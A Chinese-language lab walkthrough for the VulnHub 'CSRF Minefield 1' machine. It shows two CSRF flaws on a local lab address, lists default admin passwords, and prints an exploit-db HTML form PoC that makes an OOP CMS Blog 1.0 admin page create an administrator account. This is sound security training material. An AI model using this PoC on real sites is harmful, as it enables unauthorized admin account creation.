CSRF Minefield 1靶場***

靶場下載連接 https://www.vulnhub.com/entry/csrf-minefield-1,316/php

兩處漏洞html

第一處:訪問http://192.168.110.208/hotelcal/admin/add_account.php原始密碼 admin . admin
1.首先訪問網站點擊建立一個新用戶
在這裏插入圖片描述ide

2.建立完帳戶以後使用bp攔截抓去數據包
在這裏插入圖片描述oop

3.發現沒有使用Cookie token,將其數據包發送給burpsuite插件CSRF POC(burpsuite裏可下載)可自行改密碼帳號,以下:
在這裏插入圖片描述post

4.將生產的POC保存爲csrfpoc.htm 或者直接複製地址進行訪問,就成功建立用戶
在這裏插入圖片描述網站

第二處:
訪問http://192.168.110.208/oop/admin/addUser.php 原始密碼admin . 123ui

首先我是在https://www.exploit-db.com/裏面搜的OOP CMS Blog 1.0發現有一個是建立管理員,如今進行實現:
1.我先把上面的poc給下載下來 以後把他的ip、路徑改爲我本身的,最後生成一個html文件。插件

# POC: 
# 2)
# http://192.168.110.208/oop/admin/addUser.php
# 
<html>
<body>
<form action="http://192.168.110.208/oop/admin/addUser.php" method="post" enctype="multipart/form-data">
<table class="form">                    
<tbody><tr>
<td>
<label>User Name</label>
</td>
<td>
<input name="userName" placeholder="Enter User Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>Full Name</label>
</td>
<td>
<input name="name" placeholder="Enter User Full Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>User Password</label>
</td>
<td>
<input name="password" placeholder="Enter User Password..." type="text">
</td>
</tr>
<tr>
<td>
<label>Email</label>
</td>
<td>
<input name="email" placeholder="Enter User Email..." type="text">
</td>
</tr>
<tr>
<td>
<label>Details</label>
</td>
<td> 
<textarea name="details"></textarea>
</td>
</tr>
<tr>
<td>
<label>User Roll</label>
</td>
<td>
<select id="select" name="role">
<option>Select User Role</option>
<option value="0">Admin</option>
<option value="1">Author</option>
<option value="2">Editor</option>
</select>
</td>
</tr>
<tr>
<td></td> 
<td>
<input name="submit" value="Create" type="submit">
</td>
</tr>
</tbody>
</table>
</form>
</body>
</html>

2.點擊生成的文件,如圖:
在這裏插入圖片描述
3.進行輸入用戶,密碼、選擇管理員以後點擊提交,他會自動跳轉到建立用戶的頁面,發現他提示建立成功
在這裏插入圖片描述code

相關文章
相關標籤/搜索